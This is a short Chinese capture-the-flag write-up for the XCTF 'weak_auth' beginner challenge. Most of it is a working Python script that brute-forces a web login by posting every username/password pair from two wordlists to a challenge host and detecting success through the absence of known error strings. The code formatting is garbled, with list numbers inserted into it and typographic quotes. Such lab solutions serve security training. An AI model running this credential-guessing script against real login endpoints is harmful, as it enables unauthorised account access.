XCTF-weak_auth

新手练习区 - 8/12

🐍🐍🐍代码🐍🐍🐍

  1. 用户字典+密码字典,for循环搭配遍历并发包
  2. 保存返回包的“.text
    1. 检测是否有能判断无Flag的代码,如本案例为“password error”和“please login as admin”
    2. 和前一个包对比,如果不同则打印 ```python import requests

def ReadDictionary(txtUser, txtPassword): with open(txtUser, encoding=’utf-8’) as f: listUser = f.read().splitlines()

  1. # print(listUser)
  2. with open(txtPassword, encoding='utf-8') as f:
  3.     listPassword = f.read().splitlines()
  4. # print(listPassword)
  5. return listUser, listPassword

def BruteForce_UserAndPassword(inputUser, inputPassword): bGet = 0 listResponse = [] for iUser in inputUser: for iPassword in inputPassword: dic2Post = { ‘username’:iUser, ‘password’:iPassword }

  1.         # print(dic2Post)
  2.         response = requests.post(url, data=dic2Post, timeout=33)
  3.         if response.status_code == 200:
  4.             textResponse = response.text
  5.             # 根据错误的返回包中的提醒字符串
  6.             if ((strErr1 not in textResponse) and (strErr2 not in textResponse)):
  7.                 print("密码为:", dic2Post)
  8.                 bGet = 1
  9.             elif textResponse not in listResponse:
  10.                 listResponse.append(textResponse)
  12. if bGet == 0:
  13.     print("所有返回包:")
  14.     print(set(listResponse))

url = r”http://111.200.241.244:63653/check.php“ txtUser = r”User.txt” txtPassword = r”Password.txt” strErr1 = “password error” strErr2 = “please login as admin” if name == ‘main‘: listUser, listPassword = ReadDictionary(txtUser, txtPassword) BruteForce_UserAndPassword(listUser, listPassword) ```